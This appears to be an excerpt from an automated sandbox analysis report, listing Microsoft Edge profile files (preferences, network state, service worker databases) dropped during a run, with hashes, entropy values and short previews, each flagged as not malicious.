                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\a717c930-74db-440f-8bbf-f6496ce6b2d2.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1419
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                                  MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                                  SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                                  SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                                  SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e684995a-d74e-464a-b172-5ac41c81b74f.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\eeade3f9-c945-42dc-bc5d-b45c5d148691.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4b68b.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4fb92.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9817
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.118759342018169
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:stp+kdpzszksZihUkzEu8+bV+FLPQA66WmaFIMYqPwYJ:stp+Qzszkfh5bGjQx6WmaTYm
                                                                                                                                                                                                                                                                                                  MD5:5EAC6061A8BBB676B9026F257FC68693
                                                                                                                                                                                                                                                                                                  SHA1:5E3B7EECF48E91B0A9D541DAF3AF74C4606E6688
                                                                                                                                                                                                                                                                                                  SHA-256:71515700038866DE6DBD4A4A96ABBC8D08D7E65C51AC62F286E17B089F0BA820
                                                                                                                                                                                                                                                                                                  SHA-512:26647A27FA44CBFC7E518D812AA99BB6B0333B4C136DD9DBFDE5997A9B39E919C4FF1ADC4FA99CD3392723EB8C1B59411AB3F89BB75857A20DF3C4E4BA1688B3
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:hF/oSwWPEmfMH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVh80bErwOp8tuV:hF/oSwWPEmfMHu1jagXbd1tK
                                                                                                                                                                                                                                                                                                  MD5:5F9FCCEB924EAC3B25C6C070503B055C
                                                                                                                                                                                                                                                                                                  SHA1:7B0BF34CC947C37CA3A39AE5194611767BF0CB28
                                                                                                                                                                                                                                                                                                  SHA-256:06904C39FC9B4CC66670139BF36BA4C647D9D995A0C82DE2754D437A32499023
                                                                                                                                                                                                                                                                                                  SHA-512:339C9819F2F7CA3012B022C2857EBAD0709F6E81A5AE6EFCCA4FF06126904C09339A6EDE76B7EC3043D3D95D0F986CE48D35E5D4F1C9BA8E2C9915D293CB0DCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4b1b8.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:hF/oSwWPEmfMH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVh80bErwOp8tuV:hF/oSwWPEmfMHu1jagXbd1tK
                                                                                                                                                                                                                                                                                                  MD5:5F9FCCEB924EAC3B25C6C070503B055C
                                                                                                                                                                                                                                                                                                  SHA1:7B0BF34CC947C37CA3A39AE5194611767BF0CB28
                                                                                                                                                                                                                                                                                                  SHA-256:06904C39FC9B4CC66670139BF36BA4C647D9D995A0C82DE2754D437A32499023
                                                                                                                                                                                                                                                                                                  SHA-512:339C9819F2F7CA3012B022C2857EBAD0709F6E81A5AE6EFCCA4FF06126904C09339A6EDE76B7EC3043D3D95D0F986CE48D35E5D4F1C9BA8E2C9915D293CB0DCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4fa5a.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:hF/oSwWPEmfMH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVh80bErwOp8tuV:hF/oSwWPEmfMHu1jagXbd1tK
                                                                                                                                                                                                                                                                                                  MD5:5F9FCCEB924EAC3B25C6C070503B055C
                                                                                                                                                                                                                                                                                                  SHA1:7B0BF34CC947C37CA3A39AE5194611767BF0CB28
                                                                                                                                                                                                                                                                                                  SHA-256:06904C39FC9B4CC66670139BF36BA4C647D9D995A0C82DE2754D437A32499023
                                                                                                                                                                                                                                                                                                  SHA-512:339C9819F2F7CA3012B022C2857EBAD0709F6E81A5AE6EFCCA4FF06126904C09339A6EDE76B7EC3043D3D95D0F986CE48D35E5D4F1C9BA8E2C9915D293CB0DCF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.323098996850684
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:chltUQ2Hm4kxH4xRNwBgzNnNurkXn:chXUQI2xH8BzNmen
                                                                                                                                                                                                                                                                                                  MD5:8DA62954B0B14642CF287A260418E39B
                                                                                                                                                                                                                                                                                                  SHA1:E82BF98669AE1D73BBD9294D9F454044D5C2622E
                                                                                                                                                                                                                                                                                                  SHA-256:B7E25784D1B3A3653C618822715DAE7CC86BF0B05FFF0CF3C5D6A1FB169F0614
                                                                                                                                                                                                                                                                                                  SHA-512:E44DC92CAA0579A81CBF176A589493421AAD851D7006603B54684EE8CBFC67F572F2B0219F4483227F3FF9CC614D882B2ADB8060873E358C7D6870CAF9E3865C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):297
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.130089774255329
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4hZR1923oH+TcwtE/a252KLl34hdL9+q2P923oH+TcwtE/a2ZIFUv:BsZ8Yeb8xLpsv+v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                  MD5:FEF7D3DCD0F3961D2449591A014EAFC2
                                                                                                                                                                                                                                                                                                  SHA1:5A309B864AA838821A342468F152B11788E5D76B
                                                                                                                                                                                                                                                                                                  SHA-256:CB73C62903BD1D7C946EC17CDB1FD5C22F9F5FF22EDC3E0D931490CDD10382B8
                                                                                                                                                                                                                                                                                                  SHA-512:4602573B158788470F552D99D55F2BCF8380B4326AE09219D603E5334FED2D270A1DDA95BF95A5237337D6A65CC8FB332FDEA2C4F5E097702D77EEA2FA70D6E9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:37.415 4cc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/12/27-01:01:37.431 4cc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):114579
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5783086402133115
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:kU906yxPXfOxr1lhCe1nL/ImL/rBZXECjPXNtsf387ekP1mu:J9LyxPXfOxr1lMe1nL/5L/TXE6n7dz
                                                                                                                                                                                                                                                                                                  MD5:06843090B3980191ECA6367BDC1627B5
                                                                                                                                                                                                                                                                                                  SHA1:EE110C87AD436420E08D87FC3F60AE3C508D651B
                                                                                                                                                                                                                                                                                                  SHA-256:FC4687FFFE00D501B502A6204B401585E61627453198341C6EE33C3CD5091171
